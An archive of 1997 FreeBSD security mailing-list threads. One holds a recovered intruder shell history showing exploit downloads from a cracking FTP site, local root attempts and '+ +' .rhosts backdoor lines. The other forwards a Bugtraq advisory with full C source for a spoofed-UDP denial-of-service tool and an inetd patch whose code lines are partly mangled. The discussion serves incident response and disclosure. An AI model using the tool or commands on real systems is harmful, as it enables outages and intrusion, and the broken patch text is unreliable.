From owner-freebsd-security Fri Jun 20 09:33:38 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA10958 for security-outgoing; Fri, 20 Jun 1997 09:33:38 -0700 (PDT) Received: from rosemary.fsl.noaa.gov (rosemary.fsl.noaa.gov [137.75.8.41]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA10937 for ; Fri, 20 Jun 1997 09:33:26 -0700 (PDT) Received: from sage.fsl.noaa.gov (sage.fsl.noaa.gov [137.75.253.42]) by rosemary.fsl.noaa.gov (8.8.5/8.8.5) with SMTP id KAA03730 for ; Fri, 20 Jun 1997 10:33:19 -0600 (MDT) Message-ID: <33AAB0CA.2781E494@fsl.noaa.gov> Date: Fri, 20 Jun 1997 10:33:14 -0600 From: Sean Kelly Organization: CIRA/NOAA X-Mailer: Mozilla 3.0Gold (X11; I; FreeBSD 2.2-RELEASE i386) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Attempt to compromise root Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I'm running FreeBSD 2.2-RELEASE. One of my users (okay, she's my wife) had submitted a crontab which had a bad MAILTO line in it, resulting in a MAILER-DAEMON message being sent to me every time the job was run ... and the job was set to run every minute: * * * * * id When I asked the her, she said she didn't know what a crontab file was. That's when I suspected foul play. The wtmp indicated that she had logged in from a remote site early in the morning when I *know* :-) she was asleep. Then we found the following in her .history file: -------------------------------------------------------------------- rm * ftp the.art.of.sekurity.org more /etc/passwd ls cc -o gr1 bsd1.c rm bsd1.c rm gr1 cc -o gr1 bsd2.c chmod 700 gr1 ./gr1 ./gr1 mary root rm gr1 ls -al cc -o gr bsd3.c chmod 700 gr ./gr ls rm bsd2.c rm bsd3.c ls rm gr cc -o gr bsd4.c ls -al ./gr rm bsd4.c gr cc -o gr bsd5.c ls -al ./gr id rm gr rm bsd5 rm bsd5.c cc -o gr bsd6.c ./gr rm bsd6.c rm gr ls -al cc -o gr bsd7.c ls -al rm bsd7.c ftp the.art.of.sekurity.org ls cc -o jump jump.c ls -al ./jump id ./jump rm * uname -a cd /bin ls -al | more ls -al | grep wheel cd .. ls -al cd etc ls -al | more more security ls -al mast* cd / cat .rhosts cd cat .rhosts ls -al ls -al | grep drwx telnet localhost 25 cd /tmp.tmp cd /tmp/.tmp ftp the.art.of.sekurity.org ls -al cc -o gr bsd1.c more bsd1.c rm gr mv bsd1.c egg.c cc -s -o /tmp/.tmp/egg -O egg.c EDITOR='/tmp/.tmp/egg -1259' export EDITOR EDITOR='/tmp/.tmp/egg -1259' e ; xport EDITOR EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR more bsd1.c ls -al more egg.c crontab -e ls more egg.c EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR bash whereis bash /usr/ports/shells/bash ls -al /usr/ports/shells/bash /bin/sh ls -al rm egg* pico bsd2.c more bsd2.c mv bsd2.c bsd.sh ./bsd.sh chmod 700 bsd.sh ./bsd.sh cd /tmp ls sh* cd .tmp ls -al rm bsd.sh cp bsd.one bsd.c vi bsd.c ls rm bsd.one rm bsd.c ls cc -o gr bsd3.c ls rm bsd3.c ftp the.art.of.sekurity.org ls tar xfv bsd.tar mv grind.c ohjoy.c sploit .. cd .. chmod 700 sploit chmod 644 *.c ./sploit id kill ^1 kill %1 rm ohj* rm grind* rm sploit* ls rmdir .tmp cd ls -al rm -rf /tmp/.tmp whereis larn cd /tmp mkdir tmp cd tmp ftp the.art.of.sekurity.org ls cc -o fuck bsd1.c ./fuck ls rm fuck cc -o fuck bsd2.c ./fuck rm fuck cc -o fuck bsd3.c ls ls /usr/bin/crontab ls -al /usr/bin/crontab cc -o fuck bsd4.c ./fuck ./fuck lp1 ./fuck bamboo ls rm fuck more bsd1.sh ./bsd1.sh chmod 700 bsd1.sh ./bsd1.sh more bsd2.sh chmod 700 bsd2. chmod 700 bsd2.* ./bsd2.sh ls -al rm * cd .. rmdir .tmp cd rm -rf /tmp/tmp cd /etc cat hosts cd /home ls -al cd rosemary/ ls ls -al find . -name .rhosts -print ypcat passwd w cd /etc more passwd cd /u ls -al pwd cd .. ls ls -al echo "+ +" >> .rhosts echo "+ +" > .rhosts ls -al | more exit cd /home ls cd rosemary/ ls ls -al cd ls -al | more rm .history exit -------------------------------------------------------------------- Luckily, the idiot didn't realize that the .history file is updated after logout, and we got a record of most of his/her activities. I've tried ftp'ing to the.art.of.sekurity.org and have been successful only once, but haven't been able to transfer any files. sekurity.org appears registered to a organization called "Insekurity, Inc.". I checked config files, .rhosts, system binaries, and everything seems intact, so I don't think root was compromised. However, I don't have an md5/mtree digest of everything so I'm not 100% sure. Next I'll go back to source media and do some comparisons. So, two issues: (1) Does this type of attack seem familiar? Is anyone aware of "sekurity.org" and what their purpose is? Is there someone there to whom I should complain? (Doubtful, as it appears the reason that ftp site exists is to provide a repository of cracking code.) (2) Can we get an option during the FreeBSD install to generate the md5/mtree digest? Naturally, I read up on this feature after the attack, but after an attack it's too late. -- Sean Kelly NOAA Forecast Systems Laboratory Boulder Colorado USA From owner-freebsd-security Fri Jun 20 11:21:29 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA16348 for security-outgoing; Fri, 20 Jun 1997 11:21:29 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA16343 for ; Fri, 20 Jun 1997 11:21:26 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.5/8.6.9) with ESMTP id LAA25520; Fri, 20 Jun 1997 11:20:49 -0700 (PDT) To: Sean Kelly cc: freebsd-security@FreeBSD.ORG Subject: Re: Attempt to compromise root In-reply-to: Your message of "Fri, 20 Jun 1997 10:33:14 MDT." <33AAB0CA.2781E494@fsl.noaa.gov> Date: Fri, 20 Jun 1997 11:20:48 -0700 Message-ID: <25515.866830848@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > I've tried ftp'ing to the.art.of.sekurity.org and have been successful > only once, but haven't been able to transfer any files. sekurity.org > appears registered to a organization called "Insekurity, Inc.". I've got the contents of the site mirrored now and I'll have a look through some of it as I have time. It's possible that there are some genuine compromises here, but it's hard to say. > (1) Does this type of attack seem familiar? Is anyone aware of Yes, but then a good 90% of the attacks I've seen are using somebody's "rootkit" (e.g. the attackers rarely understand the mechanics of what they're doing - it's all done by rote) and so in saying that it's familiar, all I'm saying is that it's distressingly typical. :( > "sekurity.org" and what their purpose is? Is there someone there to > whom I should complain? (Doubtful, as it appears the reason that ftp > site exists is to provide a repository of cracking code.) There are dozens of such sites around - I doubt you'd get much more than laughed at if you tried to make an issue of it. > (2) Can we get an option during the FreeBSD install to generate the > md5/mtree digest? Naturally, I read up on this feature after the You mean of the exact tree you've installed? Hmmmm. There are the foo.mtree files in each distribution, but is there some reason why that wouldn't be enough? The bin.mtree file in particular pretty much covers any of the binaries you'd probably be interested in... Jordan From owner-freebsd-security Fri Jun 20 12:09:31 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA19008 for security-outgoing; Fri, 20 Jun 1997 12:09:31 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA19000 for ; Fri, 20 Jun 1997 12:09:23 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.5/8.8.5) id PAA02705; Fri, 20 Jun 1997 15:09:16 -0400 (EDT) Date: Fri, 20 Jun 1997 15:09:16 -0400 (EDT) From: Garrett Wollman Message-Id: <199706201909.PAA02705@khavrinen.lcs.mit.edu> To: Sean Kelly Cc: freebsd-security@FreeBSD.ORG Subject: Attempt to compromise root In-Reply-To: <33AAB0CA.2781E494@fsl.noaa.gov> References: <33AAB0CA.2781E494@fsl.noaa.gov> Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk < said: > (2) Can we get an option during the FreeBSD install to generate the > md5/mtree digest? Naturally, I read up on this feature after the > attack, but after an attack it's too late. There already is such a thing. Every recent release includes mtree files with md5 digests of everything included in the distribution. See the FTP site or CD-ROM. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick From owner-freebsd-security Fri Jun 20 13:11:24 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA21938 for security-outgoing; Fri, 20 Jun 1997 13:11:24 -0700 (PDT) Received: from eyelab.psy.msu.edu (eyelab.psy.msu.edu [35.8.64.179]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA21929 for ; Fri, 20 Jun 1997 13:11:17 -0700 (PDT) Received: from graphics ([35.8.110.12]) by eyelab.psy.msu.edu (8.8.5/8.8.5) with SMTP id QAA23288 for ; Fri, 20 Jun 1997 16:02:51 -0400 (EDT) Message-Id: <3.0.2.32.19970620160012.008d12c0@eyelab.msu.edu> X-Sender: root@eyelab.msu.edu X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.2 (32) Date: Fri, 20 Jun 1997 16:00:12 -0700 To: freebsd-security@FreeBSD.ORG From: Gary Schrock Subject: Re: Attempt to compromise root In-Reply-To: <25515.866830848@time.cdrom.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk At 11:20 AM 6/20/97 -0700, you wrote: >> (2) Can we get an option during the FreeBSD install to generate the >> md5/mtree digest? Naturally, I read up on this feature after the > >You mean of the exact tree you've installed? Hmmmm. There are >the foo.mtree files in each distribution, but is there some reason >why that wouldn't be enough? The bin.mtree file in particular >pretty much covers any of the binaries you'd probably be interested >in... During the install might not be as usefull as during the make world process. I know I've put together the mtree information for systems that I look after, and having to do it anytime I update a file is a little annoying (in general I forget to update it until the nightly run is done and it complains that things are different than what it expects). Another possiblity (and I don't know how practical this might be), is to incorporate mtree into the normal nightly security check. Gary Schrock root@eyelab.msu.edu From owner-freebsd-security Fri Jun 20 13:45:21 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA23977 for security-outgoing; Fri, 20 Jun 1997 13:45:21 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA23972 for ; Fri, 20 Jun 1997 13:45:08 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.5/8.8.5) id QAA02968; Fri, 20 Jun 1997 16:45:01 -0400 (EDT) Date: Fri, 20 Jun 1997 16:45:01 -0400 (EDT) From: Garrett Wollman Message-Id: <199706202045.QAA02968@khavrinen.lcs.mit.edu> To: Garrett Wollman Cc: freebsd-security@FreeBSD.ORG Subject: Attempt to compromise root In-Reply-To: <199706201909.PAA02705@khavrinen.lcs.mit.edu> References: <33AAB0CA.2781E494@fsl.noaa.gov> <199706201909.PAA02705@khavrinen.lcs.mit.edu> Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk < There already is such a thing. Every recent release includes mtree > files with md5 digests of everything included in the distribution. > See the FTP site or CD-ROM. I forgot to mention.... Probably the release engineer should generate and publish a digital signature of the files and the distribution's associated CHECKSUMS.MD5. Actually, the installation system ought to be able itself to at least verify the MD5s of the tarballs it retrieves. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick From owner-freebsd-security Fri Jun 20 14:47:33 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA26761 for security-outgoing; Fri, 20 Jun 1997 14:47:33 -0700 (PDT) Received: from hobbes.cuckoo.com (hobbes.cuckoo.com [206.109.5.43]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA26753 for ; Fri, 20 Jun 1997 14:47:26 -0700 (PDT) Received: (from dbaker@localhost) by hobbes.cuckoo.com (8.8.5/8.8.3) id QAA26252; Fri, 20 Jun 1997 16:38:32 -0500 (CDT) From: Daniel Baker Message-Id: <199706202138.QAA26252@hobbes.cuckoo.com> Subject: Re: Attempt to compromise root To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Fri, 20 Jun 1997 16:38:28 -0500 (CDT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <25515.866830848@time.cdrom.com> from "Jordan K. Hubbard" at Jun 20, 97 11:20:48 am X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > > I've tried ftp'ing to the.art.of.sekurity.org and have been successful > > only once, but haven't been able to transfer any files. sekurity.org > > appears registered to a organization called "Insekurity, Inc.". > > I've got the contents of the site mirrored now and I'll have a look > through some of it as I have time. It's possible that there are > some genuine compromises here, but it's hard to say. I attempted to do the same, and it appears that they are getting kinda paranoid from all the recent accesses: jeep % ftp the.art.of.sekurity.org Connected to the.art.of.sekurity.org. 220 the.art.of FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. Name (the.art.of.sekurity.org:dbaker): ftp 530- 530- 530- 530- It seems you have taken an interest in this machine 530- and/or its contents, if this is a general interest in the 530- domain sekurity.org you can send a request for service to 530- root@sekurity.org... If your interest is only in this machine 530- you can mail zen@sekurity.org... If you are specifically denied 530- access to this machine DO NOT WHINE ABOUT IT, I dont want to 530- listen to it... 530 User ftp access denied.. ftp: Login failed. Remote system type is UNIX. Using binary mode to transfer files. ftp> Intresting.... Daniel -- Daniel Baker (dbaker@cuckoo.com) Chief Technology and Executive Officer -- CuckooNet! (http://www.cuckoo.com) From owner-freebsd-security Fri Jun 20 16:01:49 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA00443 for security-outgoing; Fri, 20 Jun 1997 16:01:49 -0700 (PDT) Received: from hobbes.cuckoo.com (hobbes.cuckoo.com [206.109.5.43]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA00438 for ; Fri, 20 Jun 1997 16:01:41 -0700 (PDT) Received: (from dbaker@localhost) by hobbes.cuckoo.com (8.8.5/8.8.3) id SAA27594; Fri, 20 Jun 1997 18:01:07 -0500 (CDT) From: Daniel Baker Message-Id: <199706202301.SAA27594@hobbes.cuckoo.com> Subject: Re: Attempt to compromise root To: vazquez@IQM.Unicamp.BR (Pedro A M Vazquez) Date: Fri, 20 Jun 1997 18:01:03 -0500 (CDT) Cc: freebsd-security@freebsd.org In-Reply-To: <199706202221.TAA01514@kalypso.iqm.unicamp.br> from "Pedro A M Vazquez" at Jun 20, 97 07:21:07 pm X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > It still working for me (second try): > > ftp the.art.of.sekurity.org > Connected to the.art.of.sekurity.org. > 220 the.art.of FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. > Name (the.art.of.sekurity.org:vazquez): anonymous > 331 Guest login ok, send your complete e-mail address as password. > Password: > 230 Guest login ok, access restrictions apply. > Remote system type is UNIX. > Using binary mode to transfer files. I still can't ftp in. I imagine he disabeled access for .com and .net (or something like that) and since you're in .br, you wouldn't be denied access. [snip] Thanks Daniel [snip] -- Daniel Baker (dbaker@cuckoo.com) Chief Technology and Executive Officer -- CuckooNet! (http://www.cuckoo.com) From owner-freebsd-security Fri Jun 20 18:17:21 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA06544 for security-outgoing; Fri, 20 Jun 1997 18:17:21 -0700 (PDT) Received: from hydrogen.nike.efn.org (resnet.uoregon.edu [128.223.170.28]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA06535 for ; Fri, 20 Jun 1997 18:17:15 -0700 (PDT) Received: (from jmg@localhost) by hydrogen.nike.efn.org (8.8.5/8.8.5) id SAA03761; Fri, 20 Jun 1997 18:17:53 -0700 (PDT) Message-ID: <19970620181753.20772@hydrogen.nike.efn.org> Date: Fri, 20 Jun 1997 18:17:53 -0700 From: John-Mark Gurney To: Garrett Wollman Cc: freebsd-security@FreeBSD.ORG Subject: Re: Attempt to compromise root References: <33AAB0CA.2781E494@fsl.noaa.gov> <199706201909.PAA02705@khavrinen.lcs.mit.edu> <199706202045.QAA02968@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.69 In-Reply-To: <199706202045.QAA02968@khavrinen.lcs.mit.edu>; from Garrett Wollman on Fri, Jun 20, 1997 at 04:45:01PM -0400 Reply-To: John-Mark Gurney Organization: Cu Networking X-Operating-System: FreeBSD 2.2.1-RELEASE i386 X-PGP-Fingerprint: B7 EC EF F8 AE ED A7 31 96 7A 22 B3 D8 56 36 F4 X-Files: The truth is out there X-URL: http://resnet.uoregon.edu/~gurney_j/ Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Garrett Wollman scribbled this message on Jun 20: > < > > There already is such a thing. Every recent release includes mtree > > files with md5 digests of everything included in the distribution. > > See the FTP site or CD-ROM. > > I forgot to mention.... > > Probably the release engineer should generate and publish a digital > signature of the files and the distribution's associated > CHECKSUMS.MD5. Actually, the installation system ought to be able > itself to at least verify the MD5s of the tarballs it retrieves. actually... I've submitted patches to Jordan that will add a -verify flag to the install.sh scripts... I just don't have the resources to build a release, so I can't test the patches... -- John-Mark Gurney Modem/FAX: +1 541 683 6954 Cu Networking Live in Peace, destroy Micro$oft, support free software, run FreeBSD From owner-freebsd-security Fri Jun 20 18:33:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA07240 for security-outgoing; Fri, 20 Jun 1997 18:33:55 -0700 (PDT) Received: from aries.bb.cc.wa.us (root@[208.8.136.11]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA07235 for ; Fri, 20 Jun 1997 18:33:53 -0700 (PDT) Received: from localhost (chris@localhost) by aries.bb.cc.wa.us (8.8.5/8.6.9) with SMTP id SAA11913; Fri, 20 Jun 1997 18:31:52 -0700 (PDT) Date: Fri, 20 Jun 1997 18:31:52 -0700 (PDT) From: Chris Coleman To: Daniel Baker cc: Pedro A M Vazquez , freebsd-security@FreeBSD.ORG Subject: Re: Attempt to compromise root In-Reply-To: <199706202301.SAA27594@hobbes.cuckoo.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk I am in the .us domain and you are right, it let me in just fine. I looked around a little and found the standard linux-root-kit and a few other interesting programs. I'll have to be more careful. Christopher J. Coleman (chris@aries.bb.cc.wa.us) Computer Support Technician I (509)-766-8873 Big Bend Community College Internet Instructor FreeBSD Book Project: http://vinyl.quickweb.com/~chrisc/book.html Disclaimer: Even Though it has My Name on it, Doesn't mean I said it. On Fri, 20 Jun 1997, Daniel Baker wrote: > > > > It still working for me (second try): > > > > ftp the.art.of.sekurity.org > > Connected to the.art.of.sekurity.org. > > 220 the.art.of FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. > > Name (the.art.of.sekurity.org:vazquez): anonymous > > 331 Guest login ok, send your complete e-mail address as password. > > Password: > > 230 Guest login ok, access restrictions apply. > > Remote system type is UNIX. > > Using binary mode to transfer files. > > I still can't ftp in. I imagine he disabeled access for .com and .net (or > something like that) and since you're in .br, you wouldn't be denied > access. > > [snip] > > Thanks > > Daniel > > [snip] > > -- > Daniel Baker (dbaker@cuckoo.com) > Chief Technology and Executive Officer -- CuckooNet! (http://www.cuckoo.com) > From owner-freebsd-security Sat Jun 21 21:23:10 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA07104 for security-outgoing; Sat, 21 Jun 1997 21:23:10 -0700 (PDT) Received: from panda.hilink.com.au (panda.hilink.com.au [203.8.15.25]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA07088 for ; Sat, 21 Jun 1997 21:22:56 -0700 (PDT) Received: (from danny@localhost) by panda.hilink.com.au (8.8.5/8.8.5) id OAA24228; Sun, 22 Jun 1997 14:22:50 +1000 (EST) Date: Sun, 22 Jun 1997 14:22:49 +1000 (EST) From: "Daniel O'Callaghan" To: freebsd-security@freebsd.org Subject: Simple TCP service can hang a system (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk ---------- Forwarded message ---------- Date: Sat, 21 Jun 1997 23:58:16 +0200 From: Willy TARREAU To: BUGTRAQ@NETSPACE.ORG Subject: Simple TCP service can hang a system Hi ! I've noticed that inetd doesn't check the source port for the request to UDP simple services (echo, time, chargen, daytime). This means it is possible to build a packet which will look like it comes from one of these ports, to one of these ports. In this case, each UDP response from the simple service will generate a new request to the source port and the system or network can be quickly overloaded. to test this, I've written a program, let's say an exploit... It completely builds an UDP packet from RAW IP. You just have to specify which IP and PORT you want for source and destination, and then look at the result. On my Linux 2.0.29, inetd goes to 99% CPU when source/dest are the same machine with any of these 4 ports. I tested Netware Client 32 for DOS/Windows, and it simply hangs. Not tested yet on Win95/NT/Netware... Concerning Linux, I've patched inetd to prevent it from replying to requests coming from a port below one specified in the source (I chose 128). Here comes the exploit, and next, the patch for inetd (inetd from NetKit-0.09). Willy Tarreau -- +---------------+------------------------+--------------------------------+ | Willy Tarreau | tarreau@aemiaif.ibp.fr | http://www-miaif.ibp.fr/willy/ | | Magistere d'Informatique Appliquee de l'Ile de France (MIAIF), promo 97 | | DEA A.S.I.M.E. | Universite Pierre et Marie Curie (Paris 6), FRANCE | +-----------------+-------------------------------------------------------+ -------------------- UDP simple services exploit -------------------------- /* PingPong. 970621 by Willy TARREAU This program sends a spoofed UDP packet to the host you want to test. You just have to choose source address/port and destination address/port. There are two main uses of this program: - generate a packet which will make inetd reply to itself continuously on a given host. This will slow down a system because inetd will use most of the CPU to reply to its own requests. - generate a packet which will initiate a "ping pong" between two machines. In this case, this will consume network bandwidth for nothing. On Linux, inetd is fooled on these internal ports: 7: echo 13: daytime 19: chargen 37: time Netware Client 32 hangs the workstations with 7 or 19. Others not tested yet. Not tested yet on Netware nor WinNt nor Win95. As this program uses RAW sockets, you need to run it as root. */ #include #include #include #include #include #include #include #include #include struct sockaddr addrfrom; struct sockaddr addrto; int s; u_char outpack[65536]; struct iphdr *ip; struct udphdr *udp; main(int argc, char **argv) { struct sockaddr_in *from; struct sockaddr_in *to; struct protoent *proto; int i; char *src,*dest; int srcp, destp; int packetsize,datasize; fprintf(stderr,"PingPong 1.0 - 970621 by Willy Tarreau \n"); fprintf(stderr,"<<< PLEASE USE THIS FOR TESTS ONLY AND WITH ADMINISTRATORS' AUTHORIZATION >>>\n\n"); if (argc!=5) { fprintf(stderr,"wrong arg count.\nUsage: pingpong src_addr src_port dst_addr dst_port\n"); fprintf(stderr,"src_addr and dst_addr must be given as IP addresses (xxx.xxx.xxx.xxx)\n"); fprintf(stderr,"Note that it often works with 127.0.0.1 as src_addr !\n"); exit(2); } src=argv[1]; srcp=atoi(argv[2]); dest=argv[3]; destp=atoi(argv[4]); if (!(proto = getprotobyname("raw"))) { perror("getprotobyname(raw)"); exit(2); } /* "raw" should be 255 */ if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) { perror("socket"); exit(2); } memset(&addrfrom, 0, sizeof(struct sockaddr)); from = (struct sockaddr_in *)&addrfrom; from->sin_family = AF_INET; from->sin_port=htons(srcp); if (!inet_aton(src, &from->sin_addr)) { fprintf(stderr,"Incorrect address for 'from': %s\n",src); exit(2); } memset(&addrto, 0, sizeof(struct sockaddr)); to = (struct sockaddr_in *)&addrto; to->sin_family = AF_INET; to->sin_port=htons(destp); if (!inet_aton(dest, &to->sin_addr)) { fprintf(stderr,"Incorrect address for 'to': %s\n",dest); exit(2); } packetsize=0; /* lets's build a complete UDP packet from scratch */ ip=(struct iphdr *)outpack; ip->version=4; /* IPv4 */ ip->ihl=5; /* 5 words IP header */ ip->tos=0; ip->id=0; ip->frag_off=0; ip->ttl=0x40; if (!(proto = getprotobyname("udp"))) { perror("getprotobyname(udp)"); exit(2); } /* "udp" should be 17 */ ip->protocol=proto->p_proto; /* udp */ ip->check=0; /* null checksum, will be automatically computed by the kernel */ ip->saddr=from->sin_addr.s_addr; ip->daddr=to->sin_addr.s_addr; /* end of ip header */ packetsize+=ip->ihl<<2; /* udp header */ udp=(struct udphdr *)((int)outpack + (int)(ip->ihl<<2)); udp->source=htons(srcp); udp->dest=htons(destp); udp->check=0; /* ignore checksum */ packetsize+=sizeof(struct udphdr); /* end of udp header */ /* add udp data here if you like */ for (datasize=0;datasize<8;datasize++) { outpack[packetsize+datasize]='A'+datasize; } packetsize+=datasize; udp->len=htons(sizeof(struct udphdr)+datasize); ip->tot_len=htons(packetsize); if (sendto(s, (char *)outpack, packetsize, 0, &addrto, sizeof(struct sockaddr))==-1) { perror("sendto"); exit(2); } printf("packet sent !\n"); close(s); printf("end\n"); exit(0); } -------------------- patch for inetd -------------------- --- inetd.c Sat Nov 23 19:44:12 1996 +++ inetd-fix.c Sat Jun 21 23:38:09 1997 @@ -170,6 +170,7 @@ #define TOOMANY 40 /* don't start more than TOOMANY */ #define CNT_INTVL 60 /* servers in CNT_INTVL sec. */ #define RETRYTIME (60*10) /* retry after bind or server fail */ +#define MINSRCPORT 128 /* below this port, UDP requests are ignored */ #define SIGBLOCK (sigmask(SIGCHLD)|sigmask(SIGHUP)|sigmask(SIGALRM)) @@ -1271,6 +1272,8 @@ size = sizeof(sa); if ((i = recvfrom(s, buffer, sizeof(buffer), 0, &sa, &size)) < 0) return; + if (ntohs(((struct sockaddr_in *)(&sa))->sin_port)sin_port)= LINESIZ) bcopy(rs, text, LINESIZ); else { @@ -1423,6 +1429,10 @@ size = sizeof(sa); if (recvfrom(s, (char *)&result, sizeof(result), 0, &sa, &size) < 0) return; + + if (ntohs(((struct sockaddr_in *)(&sa))->sin_port)sin_port) Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA09390 for security-outgoing; Sat, 21 Jun 1997 22:27:35 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA09385 for ; Sat, 21 Jun 1997 22:27:32 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.5/8.8.5) id BAA09678; Sun, 22 Jun 1997 01:27:20 -0400 (EDT) Date: Sun, 22 Jun 1997 01:27:20 -0400 (EDT) From: Garrett Wollman Message-Id: <199706220527.BAA09678@khavrinen.lcs.mit.edu> To: "Daniel O'Callaghan" Cc: freebsd-security@FreeBSD.ORG Subject: Simple TCP service can hang a system (fwd) In-Reply-To: References: Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk < said: > I've noticed that inetd doesn't check the source port for the request > to UDP simple services (echo, time, chargen, daytime). This was fixed in FreeBSD about two or three years ago... -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick From owner-freebsd-security Sat Jun 21 23:07:20 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA11075 for security-outgoing; Sat, 21 Jun 1997 23:07:20 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA11070 for ; Sat, 21 Jun 1997 23:07:13 -0700 (PDT) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.5/8.7.3) id PAA11138; Sun, 22 Jun 1997 15:37:03 +0930 (CST) From: Michael Smith Message-Id: <199706220607.PAA11138@genesis.atrad.adelaide.edu.au> Subject: Re: Simple TCP service can hang a system (fwd) In-Reply-To: from Daniel O'Callaghan at "Jun 22, 97 02:22:49 pm" To: danny@panda.hilink.com.au (Daniel O'Callaghan) Date: Sun, 22 Jun 1997 15:37:03 +0930 (CST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Daniel O'Callaghan stands accused of saying: > > I've noticed that inetd doesn't check the source port for the request > to UDP simple services (echo, time, chargen, daytime). (note that this is Linux). FreeBSD ships with these disabled : # "Small servers" -- used to be standard on, but we're more conservative # about things due to Internet security concerns. Only turn on what you # need. # #daytime stream tcp nowait root internal #daytime dgram udp wait root internal #time stream tcp nowait root internal #time dgram udp wait root internal #echo stream tcp nowait root internal #echo dgram udp wait root internal #discard stream tcp nowait root internal #discard dgram udp wait root internal #chargen stream tcp nowait root internal #chargen dgram udp wait root internal ... so if you turn them on, you ought to understand this already 8) -- ]] Mike Smith, 